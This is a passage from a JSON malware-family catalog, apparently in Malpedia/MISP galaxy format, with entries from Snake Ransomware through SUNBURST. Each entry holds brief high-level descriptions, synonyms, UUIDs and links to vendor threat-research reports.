ransomware. This malware will remove shadow copies and kill processes related to SCADA/ICS devices, virtual machines, remote management tools, network management software, and others. After this, encryption of files on the device commences, while skipping Windows system folders and various system files. A random 5 character string is appended to encrypted files. According to Bleeping Computer, this ransomware takes an especially long time to encrypt files on a targeted machine. This ransomware is reported to target an entire network, rather than individual workstations.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snake", "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems", "https://www.crowdstrike.com/blog/adversaries-targeting-the-manufacturing-industry/", "https://labs.sentinelone.com/new-snake-ransomware-adds-itself-to-the-increasing-collection-of-golang-crimeware/", "https://hub.dragos.com/hubfs/Whitepaper-Downloads/Dragos_Manufacturing%20Threat%20Perspective_1120.pdf", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", "https://blog.malwarebytes.com/threat-analysis/2020/06/honda-and-enel-impacted-by-cyber-attack-suspected-to-be-ransomware/", "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/", "https://krebsonsecurity.com/2020/05/europes-largest-private-hospital-operator-fresenius-hit-by-ransomware", "https://www.ccn-cert.cni.es/pdf/5045-ccn-cert-id-15-20-snake-locker-english-1/file.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://ics-cert.kaspersky.com/alerts/2020/06/17/targeted-attacks-on-industrial-companies-using-snake-ransomware/", "https://github.com/albertzsigovits/malware-notes/blob/master/Snake.md", "https://www.bleepingcomputer.com/news/security/honda-investigates-possible-ransomware-attack-networks-impacted/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://twitter.com/bad_packets/status/1270957214300135426", "https://insights.sei.cmu.edu/cert/2020/03/snake-ransomware-analysis-updates.html", "https://www.bleepingcomputer.com/news/security/snake-ransomware-is-the-next-threat-targeting-business-networks/", "https://twitter.com/milkr3am/status/1270019326976786432", "https://medium.com/@nishanmaharjan17/malware-analysis-snake-ransomware-a0e66f487017", "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" ], "synonyms": [ "EKANS", "SNAKEHOSE" ], "type": [] }, "uuid": "547deef9-67c3-483e-933d-171ee8b6b918", "value": "Snake Ransomware" }, { "description": "Snatch is a ransomware which infects victims by rebooting the PC into Safe Mode. Most of the existing security protections do not run in Safe Mode so that it the malware can act without expected countermeasures and it can encrypt as many files as it finds. It uses common packers such as UPX to hide its payload.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch", "https://www.bleepingcomputer.com/news/security/snatch-ransomware-reboots-to-windows-safe-mode-to-bypass-av-tools/", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/", "https://thedfirreport.com/2020/06/21/snatch-ransomware/", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://github.com/albertzsigovits/malware-notes/blob/master/Snatch.md", "https://twitter.com/VK_Intel/status/1191414501297528832" ], "synonyms": [], "type": [] }, "uuid": "98139439-6863-439c-b4d0-c6893f1afb23", "value": "Snatch" }, { "description": "A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader", "https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/", "https://www.youtube.com/watch?v=k3sM88o_maM", "https://twitter.com/VK_Intel/status/898549340121288704", "https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/", "https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/" ], "synonyms": [], "type": [] }, "uuid": "467c726e-6e19-4d15-88b6-362cbe0b3d20", "value": "SnatchLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy", "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/" ], "synonyms": [ "ByeByeShell" ], "type": [] }, "uuid": "212d1ed7-0519-412b-a1ce-56046ca93372", "value": "SNEEPY" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula", "https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf", "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html" ], "synonyms": [ "Ursnif" ], "type": [] }, "uuid": "4f3ad937-bf2f-40cb-9695-a2bedfd41bfa", "value": "Snifula" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan", "https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9" ], "synonyms": [], "type": [] }, "uuid": "0646a6eb-1c13-4d87-878e-9431314597bf", "value": "Snojan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker" ], "synonyms": [], "type": [] }, "uuid": "99a10948-d7ba-4ad0-b73c-c7762143a193", "value": "SNS Locker" }, { "description": "According to ESET, this RAT was derived from (the open-source) Quasar RAT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] }, "uuid": "81e4fc8f-7b05-42bf-8ff9-568362d4f964", "value": "Sobaken" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig", "http://edition.cnn.com/2003/TECH/internet/08/21/sobig.virus/index.html" ], "synonyms": [ "Palyh" ], "type": [] }, "uuid": "4e9f85e7-0575-40e5-8799-288ec28237ca", "value": "Sobig" }, { "description": "Socelars is an infostealer with main focus on:\r\n* Facebook Stealer (ads/manager)\r\n* Cookie Stealer | AdsCreditCard {Amazon}", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars", "https://twitter.com/VK_Intel/status/1201584107928653824", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/" ], "synonyms": [], "type": [] }, "uuid": "4366ea63-b784-428c-bb00-89ee99eaf8c3", "value": "Socelars" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz" ], "synonyms": [], "type": [] }, "uuid": "38734f44-ebc4-4250-a20e-5dac0fb5c0ed", "value": "Socks5 Systemz" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.accenture.com/t00010101T000000Z__w__/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [ "BIRDDOG", "Nadrac" ], "type": [] }, "uuid": "da34bf80-6dc6-4b07-8094-8bed2c1176ec", "value": "SocksBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster", "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf" ], "synonyms": [ "DelfsCake", "HEAVYPOT", "dfls" ], "type": [] }, "uuid": "016ea180-ec16-48ce-88ea-c78d8db369d5", "value": "SodaMaster" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot", "https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/", "https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/", "https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/" ], "synonyms": [ "Napolar" ], "type": [] }, "uuid": "d61a1656-9413-46de-bd19-c7fe5eda3371", "value": "Solarbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker", "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/" ], "synonyms": [], "type": [] }, "uuid": "4e08d816-9fe3-42ae-b7e4-f7182445f304", "value": "solarmarker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat", "https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced" ], "synonyms": [], "type": [] }, "uuid": "2b2cffc5-bf6e-4636-a906-829c32115655", "value": "SombRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano", "https://github.com/3xp0rt/SoranoStealer", "https://3xp0rt.xyz/lpmkikVic", "https://github.com/Alexuiop1337/SoranoStealer" ], "synonyms": [], "type": [] }, "uuid": "897985dc-6b3e-4d92-bbe4-c4902194cdcc", "value": "Sorano" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya", "https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper" ], "synonyms": [], "type": [] }, "uuid": "26aa3c43-5049-4a2e-bec1-9709b31a1a26", "value": "soraya" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a", "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf" ], "synonyms": [], "type": [] }, "uuid": "0068e2fe-0d13-4073-be73-90118b1d285a", "value": "SoreFang" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east", "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" ], "synonyms": [], "type": [] }, "uuid": "bc135ba5-637b-46c9-94fc-2eef5e018bb5", "value": "Sorgu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite", "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A", "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/", "https://attack.mitre.org/wiki/Software/S0157", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx", "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/" ], "synonyms": [ "denis" ], "type": [] }, "uuid": "f4cac204-3d3f-4bb6-84bd-fc27b2f5158c", "value": "SOUNDBITE" }, { "description": "SPACESHIP searches for files with a specified set of file extensions and copies them to\r\na removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive,\r\nwhich could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is\r\nthen used to steal documents from the air-gapped system, copying them to a removable drive inserted\r\ninto the SPACESHIP-infected system", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "813e2761-6d68-493f-846b-2fc86d2e8079", "value": "SPACESHIP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spark", "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", "https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "3c676c22-8041-4cf6-8291-1bb9372e2d45", "value": "Spark" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparkle", "https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html" ], "synonyms": [], "type": [] }, "uuid": "339c60f6-8758-4d32-aa33-b0d722e924bb", "value": "Sparkle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sparksrv", "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/luckycat-redux-campaign-attacks-multiple-targets-in-india-and-japan" ], "synonyms": [], "type": [] }, "uuid": "1937c3e0-569d-4eb4-b769-ae5d9cc27755", "value": "Sparksrv" }, { "description": "Spartacus is ransomware written in .NET and emerged in the first half of 2018. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus", "https://bartblaze.blogspot.com/2018/04/this-is-spartacus-new-ransomware-on.html" ], "synonyms": [], "type": [] }, "uuid": "e4dce19f-bb8e-4ea1-b771-58b162946f29", "value": "Spartacus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear", "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets" ], "synonyms": [], "type": [] }, "uuid": "bd29030e-d440-4842-bc2a-c173ed938da4", "value": "Spedear" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot", "https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/" ], "synonyms": [], "type": [] }, "uuid": "dfbe088e-dd6d-4bad-8e2b-7a4162034da4", "value": "Spicy Hot Pot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom", "https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/", "https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/", "https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas", "https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware", "https://github.com/MinervaLabsResearch/SporaVaccination", "http://malware-traffic-analysis.net/2017/01/17/index2.html" ], "synonyms": [], "type": [] }, "uuid": "7eeafa7c-0282-4667-bb1a-5ebc3a845d6d", "value": "Spora" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot" ], "synonyms": [], "type": [] }, "uuid": "34e9d701-22a1-4315-891d-443edd077abf", "value": "SpyBot" }, { "description": "SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the \"The Next Zeus Malware\". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye", "https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot", "https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393", "https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/", "https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html", "https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html", "https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/", "http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye", "https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/" ], "synonyms": [], "type": [] }, "uuid": "814fa0b7-0468-4ed0-b910-2b3caec96d44", "value": "SpyEye" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger", "https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/" ], "synonyms": [], "type": [] }, "uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63", "value": "SquirtDanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet", "https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices", "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf", "https://www.crowdstrike.com/blog/who-is-pioneer-kitten/" ], "synonyms": [], "type": [] }, "uuid": "7e0667e8-67fd-4b5f-a3e4-3ced4dcaac1e", "value": "SSHNET" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "009db412-762d-4256-8df9-eb213be01ffd", "value": "SslMM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq", "http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html", "https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers" ], "synonyms": [], "type": [] }, "uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8", "value": "Stabuniq" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stalin_locker", "https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/" ], "synonyms": [ "StalinScreamer" ], "type": [] }, "uuid": "8c38460b-fcfd-434e-b258-875854c6aff6", "value": "StalinLocker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo", "https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/" ], "synonyms": [], "type": [] }, "uuid": "b1efbadf-26e5-4e35-8fd2-61642c30ecbf", "value": "Stampedo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft", "https://securelist.com/operation-daybreak/75100/" ], "synonyms": [], "type": [] }, "uuid": "acd8fc63-c22a-4c11-907e-33e358fdd293", "value": "StarCruft" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader", "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments" ], "synonyms": [], "type": [] }, "uuid": "f1decba9-6b3b-4636-a2b6-2208e178591a", "value": "StarLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [], "type": [] }, "uuid": "6df9bbd4-ab32-4d09-afdb-97eed274520a", "value": "StarsyPound" }, { "description": "Potentially unwanted program that changes the startpage of browsers to induce ad impressions.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage", "https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page" ], "synonyms": [ "Easy Television Access Now" ], "type": [] }, "uuid": "033dbef5-eb51-4f7b-87e6-6dc4bef72841", "value": "StartPage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker", "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" ], "synonyms": [], "type": [] }, "uuid": "d1c5a299-c072-44b5-be31-d03853bca5ea", "value": "StealthWorker Go" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader", "https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer" ], "synonyms": [], "type": [] }, "uuid": "aea21616-061d-4177-9512-8887853394ed", "value": "StegoLoader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger" ], "synonyms": [], "type": [] }, "uuid": "82ab5235-a71e-4692-a08c-8db337d8b53a", "value": "Stinger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" ], "synonyms": [], "type": [] }, "uuid": "0c5bc5c8-5136-413a-bc5a-e13333271f49", "value": "StoneDrill" }, { "description": "STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop", "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", "https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads", "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://securelist.com/keypass-ransomware/87412/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf" ], "synonyms": [ "Djvu", "KeyPass" ], "type": [] }, "uuid": "447e5d7d-dd23-43b3-8cbc-b835498a49dd", "value": "STOP Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration" ], "synonyms": [], "type": [] }, "uuid": "0439c5ec-306e-4473-84f7-50bdb5539fc2", "value": "Stration" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint", "https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/", "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/", "https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/", "https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/" ], "synonyms": [], "type": [] }, "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", "value": "Stresspaint" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4", "https://twitter.com/physicaldrive0/status/786293008278970368", "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", "https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/", "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html", "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf", "https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/" ], "synonyms": [], "type": [] }, "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", "value": "StrongPity" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", "https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf", "https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf", "https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html", "https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf", "https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/", "https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html", "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf" ], "synonyms": [], "type": [] }, "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", "value": "Stuxnet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful", "https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html", "https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "efe586da-a272-4898-9ebb-587f8f5a23ca", "value": "SUCEFUL" }, { "description": "FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst", "https://www.brighttalk.com/webcast/7451/462719", "https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/", "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", "https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance", "https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons", "https://netresec.com/?b=212a6ad", "https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/", "https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/", "https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign", "https://us-cert.cisa.gov/ncas/alerts/aa20-352a", "https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/", "https://twitter.com/cybercdh/status/1339241246024404994", "https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306", "https://www.brighttalk.com/webcast/7451/469525", "https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf", "https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug", "https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst", "https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html", "https://www.solarwinds.com/securityadvisory", "https://netresec.com/?b=211f30f", "https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view", "https://github.com/sophos-cybersecurity/solarwinds-threathunt", "https://twitter.com/megabeets_/status/1339308801112027138", "https://www.youtube.com/watch?v=cMauHTV-lJg", "https://twitter.com/0xrb/status/1339199268146442241", "https://netresec.com/?b=211cd21", "https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards", "https://github.com/RedDrip7/SunBurst_DGA_Decode", "https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution", 